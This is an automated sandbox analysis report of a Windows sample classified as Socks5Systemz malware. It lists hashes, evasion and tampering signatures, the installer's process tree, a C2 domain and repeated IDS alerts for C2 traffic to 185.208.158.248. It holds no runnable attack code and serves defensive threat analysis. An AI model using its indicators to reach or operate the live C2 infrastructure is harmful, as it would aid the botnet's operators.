Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ZFllSoXpoT.exe

Overview

General Information

Sample name:ZFllSoXpoT.exe
renamed because original name is a hash value
Original sample name:d4d88602d5675d2a3da77ca8ac8f3293.exe
Analysis ID:1527966
MD5:d4d88602d5675d2a3da77ca8ac8f3293
SHA1:f22f4bc29ba04dc1c919400a217eda856e26e39a
SHA256:9742c94768e5444d9659d98cd7b695520c16bbcc68153cac93454f4606ee8780
Tags:32exe
Infos:

Detection

Socks5Systemz
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Socks5Systemz
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Changes security center settings (notifications, updates, antivirus, firewall)
Contains functionality to infect the boot sector
Machine Learning detection for dropped file
PE file has a writeable .text section
Query firmware table information (likely to detect VMs)
AV process strings found (often used to terminate AV products)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Use Short Name Path in Command Line
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • ZFllSoXpoT.exe (PID: 5444 cmdline: "C:\Users\user\Desktop\ZFllSoXpoT.exe" MD5: D4D88602D5675D2A3DA77CA8AC8F3293)
    • ZFllSoXpoT.tmp (PID: 5200 cmdline: "C:\Users\user~1\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmp" /SL5="$10408,4236485,54272,C:\Users\user\Desktop\ZFllSoXpoT.exe" MD5: C6A64497A14D9C70B36107218E969B1F)
      • jennyvideoconverter32.exe (PID: 5936 cmdline: "C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32.exe" -i MD5: 5C125A0FB6A9C14E6767045117CEBEC4)
  • svchost.exe (PID: 4544 cmdline: C:\Windows\system32\svchost.exe -k LocalService -s W32Time MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • SgrmBroker.exe (PID: 1456 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: 3BA1A18A0DC30A0545E7765CB97D8E63)
  • svchost.exe (PID: 2020 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 6392 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • MpCmdRun.exe (PID: 4716 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: B3676839B2EE96983F9ED735CD044159)
      • conhost.exe (PID: 3876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 4828 cmdline: C:\Windows\System32\svchost.exe -k wsappx -p -s ClipSVC MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 1860 cmdline: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
{"C2 list": ["csnzndu.net"]}
SourceRuleDescriptionAuthorStrings
00000008.00000002.2564886661.0000000002E21000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Socks5SystemzYara detected Socks5SystemzJoe Security
    00000008.00000002.2564448178.0000000002D75000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Socks5SystemzYara detected Socks5SystemzJoe Security
      Process Memory Space: jennyvideoconverter32.exe PID: 5936JoeSecurity_Socks5SystemzYara detected Socks5SystemzJoe Security

        System Summary

        barindex
        Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: "C:\Users\user~1\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmp" /SL5="$10408,4236485,54272,C:\Users\user\Desktop\ZFllSoXpoT.exe" , CommandLine: "C:\Users\user~1\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmp" /SL5="$10408,4236485,54272,C:\Users\user\Desktop\ZFllSoXpoT.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmp, NewProcessName: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmp, OriginalFileName: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmp, ParentCommandLine: "C:\Users\user\Desktop\ZFllSoXpoT.exe", ParentImage: C:\Users\user\Desktop\ZFllSoXpoT.exe, ParentProcessId: 5444, ParentProcessName: ZFllSoXpoT.exe, ProcessCommandLine: "C:\Users\user~1\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmp" /SL5="$10408,4236485,54272,C:\Users\user\Desktop\ZFllSoXpoT.exe" , ProcessId: 5200, ProcessName: ZFllSoXpoT.tmp
        Source: Process startedAuthor: vburov: Data: Command: C:\Windows\system32\svchost.exe -k LocalService -s W32Time, CommandLine: C:\Windows\system32\svchost.exe -k LocalService -s W32Time, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\system32\svchost.exe -k LocalService -s W32Time, ProcessId: 4544, ProcessName: svchost.exe
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-10-07T13:27:26.512405+020020494671A Network Trojan was detected192.168.2.749971185.208.158.24880TCP
        2024-10-07T13:27:29.382038+020020494671A Network Trojan was detected192.168.2.749971185.208.158.24880TCP
        2024-10-07T13:27:30.195429+020020494671A Network Trojan was detected192.168.2.749973185.208.158.24880TCP
        2024-10-07T13:27:31.003942+020020494671A Network Trojan was detected192.168.2.749975185.208.158.24880TCP
        2024-10-07T13:27:31.352853+020020494671A Network Trojan was detected192.168.2.749975185.208.158.24880TCP
        2024-10-07T13:27:32.179522+020020494671A Network Trojan was detected192.168.2.749976185.208.158.24880TCP
        2024-10-07T13:27:32.990262+020020494671A Network Trojan was detected192.168.2.749977185.208.158.24880TCP
        2024-10-07T13:27:33.834217+020020494671A Network Trojan was detected192.168.2.749978185.208.158.24880TCP
        2024-10-07T13:27:34.649108+020020494671A Network Trojan was detected192.168.2.749979185.208.158.24880TCP
        2024-10-07T13:27:35.606520+020020494671A Network Trojan was detected192.168.2.749980185.208.158.24880TCP
        2024-10-07T13:27:36.432896+020020494671A Network Trojan was detected192.168.2.749981185.208.158.24880TCP
        2024-10-07T13:27:37.246699+020020494671A Network Trojan was detected192.168.2.749982185.208.158.24880TCP
        2024-10-07T13:27:38.070490+020020494671A Network Trojan was detected192.168.2.749983185.208.158.24880TCP
        2024-10-07T13:27:38.989448+020020494671A Network Trojan was detected192.168.2.749984185.208.158.24880TCP
        2024-10-07T13:27:39.342850+020020494671A Network Trojan was detected192.168.2.749984185.208.158.24880TCP
        2024-10-07T13:27:40.180726+020020494671A Network Trojan was detected192.168.2.749985185.208.158.24880TCP
        2024-10-07T13:27:41.175671+020020494671A Network Trojan was detected192.168.2.749986185.208.158.24880TCP
        2024-10-07T13:27:41.991297+020020494671A Network Trojan was detected192.168.2.749987185.208.158.24880TCP
        2024-10-07T13:27:43.154380+020020494671A Network Trojan was detected192.168.2.749988185.208.158.24880TCP
        2024-10-07T13:27:43.981107+020020494671A Network Trojan was detected192.168.2.749989185.208.158.24880TCP
        2024-10-07T13:27:44.876531+020020494671A Network Trojan was detected192.168.2.749990185.208.158.24880TCP
        2024-10-07T13:27:45.233904+020020494671A Network Trojan was detected192.168.2.749990185.208.158.24880TCP
        2024-10-07T13:27:46.186954+020020494671A Network Trojan was detected192.168.2.749991185.208.158.24880TCP
        2024-10-07T13:27:47.010057+020020494671A Network Trojan was detected192.168.2.749992185.208.158.24880TCP
        2024-10-07T13:27:47.911236+020020494671A Network Trojan was detected192.168.2.749993185.208.158.24880TCP
        2024-10-07T13:27:48.260957+020020494671A Network Trojan was detected192.168.2.749993185.208.158.24880TCP
        2024-10-07T13:27:49.064448+020020494671A Network Trojan was detected192.168.2.749994185.208.158.24880TCP
        2024-10-07T13:27:49.418329+020020494671A Network Trojan was detected192.168.2.749994185.208.158.24880TCP
        2024-10-07T13:27:50.225580+020020494671A Network Trojan was detected192.168.2.749995185.208.158.24880TCP
        2024-10-07T13:27:52.041356+020020494671A Network Trojan was detected192.168.2.749996185.208.158.24880TCP
        2024-10-07T13:27:52.859858+020020494671A Network Trojan was detected192.168.2.749997185.208.158.24880TCP
        2024-10-07T13:27:53.216311+020020494671A Network Trojan was detected192.168.2.749997185.208.158.24880TCP
        2024-10-07T13:27:54.039757+020020494671A Network Trojan was detected192.168.2.749998185.208.158.24880TCP
        2024-10-07T13:27:55.039352+020020494671A Network Trojan was detected192.168.2.749999185.208.158.24880TCP
        2024-10-07T13:27:55.923919+020020494671A Network Trojan was detected192.168.2.750000185.208.158.24880TCP
        2024-10-07T13:27:56.281904+020020494671A Network Trojan was detected192.168.2.750000185.208.158.24880TCP
        2024-10-07T13:27:56.676740+020020494671A Network Trojan was detected192.168.2.750000185.208.158.24880TCP
        2024-10-07T13:27:57.024759+020020494671A Network Trojan was detected192.168.2.750000185.208.158.24880TCP
        2024-10-07T13:27:57.843676+020020494671A Network Trojan was detected192.168.2.750001185.208.158.24880TCP
        2024-10-07T13:27:58.806200+020020494671A Network Trojan was detected192.168.2.750002185.208.158.24880TCP
        2024-10-07T13:27:59.653275+020020494671A Network Trojan was detected192.168.2.750003185.208.158.24880TCP
        2024-10-07T13:28:00.530532+020020494671A Network Trojan was detected192.168.2.750004185.208.158.24880TCP
        2024-10-07T13:28:01.372667+020020494671A Network Trojan was detected192.168.2.750005185.208.158.24880TCP
        2024-10-07T13:28:02.179744+020020494671A Network Trojan was detected192.168.2.750006185.208.158.24880TCP
        2024-10-07T13:28:02.990517+020020494671A Network Trojan was detected192.168.2.750007185.208.158.24880TCP
        2024-10-07T13:28:03.832242+020020494671A Network Trojan was detected192.168.2.750008185.208.158.24880TCP
        2024-10-07T13:28:04.796444+020020494671A Network Trojan was detected192.168.2.750009185.208.158.24880TCP
        2024-10-07T13:28:05.734989+020020494671A Network Trojan was detected192.168.2.750010185.208.158.24880TCP
        2024-10-07T13:28:06.087456+020020494671A Network Trojan was detected192.168.2.750010185.208.158.24880TCP
        2024-10-07T13:28:06.906572+020020494671A Network Trojan was detected192.168.2.750011185.208.158.24880TCP
        2024-10-07T13:28:07.261430+020020494671A Network Trojan was detected192.168.2.750011185.208.158.24880TCP
        2024-10-07T13:28:08.071519+020020494671A Network Trojan was detected192.168.2.750012185.208.158.24880TCP
        2024-10-07T13:28:09.050716+020020494671A Network Trojan was detected192.168.2.750013185.208.158.24880TCP
        2024-10-07T13:28:09.940186+020020494671A Network Trojan was detected192.168.2.750014185.208.158.24880TCP
        2024-10-07T13:28:10.299886+020020494671A Network Trojan was detected192.168.2.750014185.208.158.24880TCP
        2024-10-07T13:28:10.652398+020020494671A Network Trojan was detected192.168.2.750014185.208.158.24880TCP
        2024-10-07T13:28:11.460999+020020494671A Network Trojan was detected192.168.2.750015185.208.158.24880TCP
        2024-10-07T13:28:12.368402+020020494671A Network Trojan was detected192.168.2.750016185.208.158.24880TCP
        2024-10-07T13:28:13.269343+020020494671A Network Trojan was detected192.168.2.750017185.208.158.24880TCP
        2024-10-07T13:28:13.618156+020020494671A Network Trojan was detected192.168.2.750017185.208.158.24880TCP
        2024-10-07T13:28:14.467254+020020494671A Network Trojan was detected192.168.2.750018185.208.158.24880TCP
        2024-10-07T13:28:15.293845+020020494671A Network Trojan was detected192.168.2.750019185.208.158.24880TCP
        2024-10-07T13:28:16.157791+020020494671A Network Trojan was detected192.168.2.750020185.208.158.24880TCP
        2024-10-07T13:28:16.982568+020020494671A Network Trojan was detected192.168.2.750021185.208.158.24880TCP
        2024-10-07T13:28:17.829780+020020494671A Network Trojan was detected192.168.2.750022185.208.158.24880TCP
        2024-10-07T13:28:18.185159+020020494671A Network Trojan was detected192.168.2.750022185.208.158.24880TCP
        2024-10-07T13:28:19.180285+020020494671A Network Trojan was detected192.168.2.750023185.208.158.24880TCP
        2024-10-07T13:28:20.068597+020020494671A Network Trojan was detected192.168.2.750024185.208.158.24880TCP
        2024-10-07T13:28:20.904304+020020494671A Network Trojan was detected192.168.2.750025185.208.158.24880TCP
        2024-10-07T13:28:21.734751+020020494671A Network Trojan was detected192.168.2.750026185.208.158.24880TCP
        2024-10-07T13:28:22.554042+020020494671A Network Trojan was detected192.168.2.750027185.208.158.24880TCP
        2024-10-07T13:28:23.369171+020020494671A Network Trojan was detected192.168.2.750028185.208.158.24880TCP
        2024-10-07T13:28:24.202775+020020494671A Network Trojan was detected192.168.2.750029185.208.158.24880TCP
        2024-10-07T13:28:25.001817+020020494671A Network Trojan was detected192.168.2.750030185.208.158.24880TCP
        2024-10-07T13:28:25.812372+020020494671A Network Trojan was detected192.168.2.750031185.208.158.24880TCP
        2024-10-07T13:28:26.649448+020020494671A Network Trojan was detected192.168.2.750032185.208.158.24880TCP
        2024-10-07T13:28:27.485749+020020494671A Network Trojan was detected192.168.2.750033185.208.158.24880TCP
        2024-10-07T13:28:28.290282+020020494671A Network Trojan was detected192.168.2.750034185.208.158.24880TCP
        2024-10-07T13:28:29.299042+020020494671A Network Trojan was detected192.168.2.750035185.208.158.24880TCP
        2024-10-07T13:28:30.255419+020020494671A Network Trojan was detected192.168.2.750036185.208.158.24880TCP
        2024-10-07T13:28:31.058573+020020494671A Network Trojan was detected192.168.2.750037185.208.158.24880TCP
        2024-10-07T13:28:31.871458+020020494671A Network Trojan was detected192.168.2.750038185.208.158.24880TCP
        2024-10-07T13:28:32.694556+020020494671A Network Trojan was detected192.168.2.750039185.208.158.24880TCP

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: ZFllSoXpoT.exeAvira: detected
        Source: jennyvideoconverter32.exe.5936.8.memstrminMalware Configuration Extractor: Socks5Systemz {"C2 list": ["csnzndu.net"]}
        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
        Source: C:\ProgramData\ET Ammeter Side 10.7.46\ET Ammeter Side 10.7.46.exeJoe Sandbox ML: detected
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32.exeJoe Sandbox ML: detected
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpCode function: 3_2_0045D4EC GetProcAddress,GetProcAddress,GetProcAddress,ISCryptGetVersion,3_2_0045D4EC
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpCode function: 3_2_0045D5A0 ArcFourCrypt,3_2_0045D5A0
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpCode function: 3_2_0045D5B8 ArcFourCrypt,3_2_0045D5B8
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpCode function: 3_2_10001000 ISCryptGetVersion,3_2_10001000
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpCode function: 3_2_10001130 ArcFourCrypt,3_2_10001130

        Compliance

        barindex
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32.exeUnpacked PE file: 8.2.jennyvideoconverter32.exe.400000.0.unpack
        Source: ZFllSoXpoT.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpCode function: 3_2_00452A4C FindFirstFileA,GetLastError,3_2_00452A4C
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpCode function: 3_2_004751F8 FindFirstFileA,FindNextFileA,FindClose,3_2_004751F8
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpCode function: 3_2_00464048 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,3_2_00464048
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpCode function: 3_2_004644C4 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,3_2_004644C4
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpCode function: 3_2_00462ABC FindFirstFileA,FindNextFileA,FindClose,3_2_00462ABC
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpCode function: 3_2_00497A74 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,3_2_00497A74

        Networking

        barindex
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.7:49979 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.7:49982 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.7:49988 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.7:49989 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.7:49976 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.7:49998 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.7:50004 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.7:49999 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.7:49971 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.7:49975 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.7:50018 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.7:50011 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.7:50010 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.7:50013 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.7:50033 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.7:49993 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.7:50001 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.7:50014 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.7:50035 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.7:50028 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.7:49973 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.7:50007 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.7:50009 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.7:49985 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.7:49992 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.7:49981 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.7:50006 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.7:50022 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.7:49997 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.7:50016 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.7:50008 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.7:49977 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.7:49987 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.7:50027 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.7:50038 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.7:50021 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.7:49994 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.7:49978 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.7:49990 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.7:49986 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.7:50015 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.7:49980 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.7:50003 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.7:50000 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.7:49991 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.7:50025 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.7:50005 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.7:49983 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.7:50026 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.7:49984 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.7:50017 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.7:50032 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.7:50034 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.7:50023 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.7:50020 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.7:49995 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.7:50031 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.7:50030 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.7:50036 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.7:50037 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.7:50024 -> 185.208.158.248:80
